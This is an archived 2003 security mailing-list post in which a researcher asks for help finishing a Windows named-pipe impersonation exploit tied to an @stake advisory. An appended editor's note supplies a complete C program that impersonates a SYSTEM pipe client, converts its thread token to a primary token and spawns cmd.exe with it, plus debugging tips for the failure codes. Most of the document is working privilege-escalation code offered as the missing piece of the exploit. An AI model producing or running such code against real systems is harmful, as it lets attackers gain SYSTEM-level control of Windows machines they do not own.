Named Pipe Impersonation -> CreateProcessAsUser();

From: wirepair <wirepair(at)roguemail.net>
Date: Mon Jul 14 2003 - 15:45:37 EDT


Hello, I'm attempting to finish up my exploit for the @stake advisory. I've hit quite a snag when I found out that calling a new process does not inherit the privileges of the named pipe. (I must have been thinking of fork() or something, heh.) So I can impersonate SYSTEM, but I cannot create a new process with these nice privileges. Here is where I am at:
ConnectNamedPipe() <-- yada yada, wait for connection

   if (!ImpersonateNamedPipeClient(hPipe)) // impersonate the pipe so we now are SYSTEM.
   {
      printf("Failed to impersonate the named pipe.\n");
      CloseHandle(hPipe);
      return 5;
   }

   // found this on MSDN; I'm trying to get a token with full access, then call CreateProcessAsUser();
   if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &hToken)) {
      if (hToken != INVALID_HANDLE_VALUE) {
         CloseHandle(hToken);
         printf("damn: %u\n", GetLastError());
      }
   }

   MapGenericMask(&dwAccessDesired, pGeneric); // this I'm kinda shady on; looks like I'm just mapping the id to the SYSTEM name? When I call GetUserName I get garble after the OpenThreadToken unless I call MapGenericMask...

   CreateProcessAsUser(hToken, "cmd.exe",
                       NULL, NULL, NULL, true, NULL, NULL, NULL, &si, &pi);

   CloseHandle(hPipe);

Now I call CreateProcessAsUser, using the token from OpenThreadToken. In the debugger, it tries to execute cmd, but I get nothing back... If anyone wants to see my code it's at http://sh0dan.org/files/tac0tac0.c... Thanks, this is starting to bug me :),
-wire
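Editor's note, with an added example that is not from the post above and not taken from tac0tac0.c. The point the post is missing: ImpersonateNamedPipeClient() puts an impersonation token on the calling thread, and CreateProcessAsUser() only accepts a primary token, so the token from OpenThreadToken() has to be converted with DuplicateTokenEx(..., TokenPrimary, ...) first. Two smaller things that also make CreateProcess* fail quietly are an uninitialised STARTUPINFO (cb must be set) and a read-only command line. The program below does the whole sequence: serve one client on a pipe, impersonate it, duplicate the thread token into a primary token, and spawn cmd.exe with it while still impersonating (the SeAssignPrimaryTokenPrivilege check is made against the thread token, so impersonating a SYSTEM client satisfies it). The pipe name is a placeholder, not the advisory's name; the file is Windows-only and guarded so it compiles to nothing on other toolchains.

```c
/* Added example: named-pipe impersonation -> primary token -> CreateProcessAsUser.
 * Windows-only (Win32 API); guarded so other toolchains see an empty file. */
#ifdef _WIN32
#include <windows.h>
#include <stdio.h>
#ifdef _MSC_VER
#pragma comment(lib, "advapi32.lib")
#endif

/* Placeholder name (assumption); a real run uses the predictable pipe name. */
#define PIPE_NAME "\\\\.\\pipe\\example_pipe"

/* Serve one client, impersonate it, and return a PRIMARY token for that client
 * (or NULL). The thread stays impersonated on success; caller does RevertToSelf(). */
static HANDLE primary_token_from_pipe_client(const char *pipe_name)
{
    HANDLE hPipe, hThreadToken = NULL, hPrimary = NULL;
    char buf[256];
    DWORD n = 0;

    hPipe = CreateNamedPipeA(pipe_name, PIPE_ACCESS_DUPLEX,
                             PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT,
                             1, sizeof buf, sizeof buf, 0, NULL);
    if (hPipe == INVALID_HANDLE_VALUE) {
        fprintf(stderr, "CreateNamedPipe: %lu\n", GetLastError());
        return NULL;
    }
    /* ERROR_PIPE_CONNECTED = client connected before we called; still a connection. */
    if (!ConnectNamedPipe(hPipe, NULL) && GetLastError() != ERROR_PIPE_CONNECTED) {
        fprintf(stderr, "ConnectNamedPipe: %lu\n", GetLastError());
        goto done;
    }
    /* Read the client's first message before impersonating: with dynamic context
     * tracking the client's context arrives with its writes, and reading first is
     * harmless otherwise. A client that never writes would block here. */
    ReadFile(hPipe, buf, sizeof buf, &n, NULL);

    /* Needs the client to have opened the pipe at SecurityImpersonation or above
     * (the default when it passes no SECURITY_SQOS_PRESENT flags). */
    if (!ImpersonateNamedPipeClient(hPipe)) {
        fprintf(stderr, "ImpersonateNamedPipeClient: %lu\n", GetLastError());
        goto done;
    }
    /* OpenAsSelf = FALSE: the access check runs as the impersonated client, which
     * can open its own token; our real (low-privilege) context usually cannot. */
    if (!OpenThreadToken(GetCurrentThread(), TOKEN_DUPLICATE | TOKEN_QUERY, FALSE,
                         &hThreadToken)) {
        fprintf(stderr, "OpenThreadToken: %lu\n", GetLastError());
        goto done;
    }
    /* The missing step: impersonation token -> primary token. */
    if (!DuplicateTokenEx(hThreadToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation,
                          TokenPrimary, &hPrimary)) {
        fprintf(stderr, "DuplicateTokenEx: %lu\n", GetLastError());
        hPrimary = NULL;
    }
    CloseHandle(hThreadToken);
done:
    DisconnectNamedPipe(hPipe);
    CloseHandle(hPipe);
    return hPrimary;
}

/* Spawn cmdline with a primary token. Returns FALSE (and does not spawn) on a
 * bad token handle, an impersonation token, or a missing privilege. */
static BOOL spawn_as_token(HANDLE hPrimary, const char *cmdline)
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    char cmd[MAX_PATH];

    ZeroMemory(&si, sizeof si);   /* an uninitialised STARTUPINFO is a classic silent failure */
    si.cb = sizeof si;
    ZeroMemory(&pi, sizeof pi);
    lstrcpynA(cmd, cmdline, sizeof cmd);   /* CreateProcess* may write to the command line */

    if (!CreateProcessAsUserA(hPrimary, NULL, cmd, NULL, NULL, FALSE,
                              CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) {
        fprintf(stderr, "CreateProcessAsUser: %lu\n", GetLastError());
        return FALSE;
    }
    printf("spawned pid %lu\n", pi.dwProcessId);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return TRUE;
}

int main(void)
{
    HANDLE hPrimary = primary_token_from_pipe_client(PIPE_NAME);
    BOOL ok = FALSE;
    if (hPrimary) {
        ok = spawn_as_token(hPrimary, "cmd.exe");  /* still impersonating the client here */
        CloseHandle(hPrimary);
    }
    RevertToSelf();
    return ok ? 0 : 1;
}
#endif /* _WIN32 */
```

Check CreateProcessAsUser's GetLastError() when it still fails: ERROR_BAD_TOKEN_TYPE (1349) means an impersonation token was passed, ERROR_PRIVILEGE_NOT_HELD (1314) means the thread token lacks SeAssignPrimaryTokenPrivilege, which is what you get if RevertToSelf() was called before the spawn.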



Received on Mon Jul 14 16:19:29 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:40 EDT

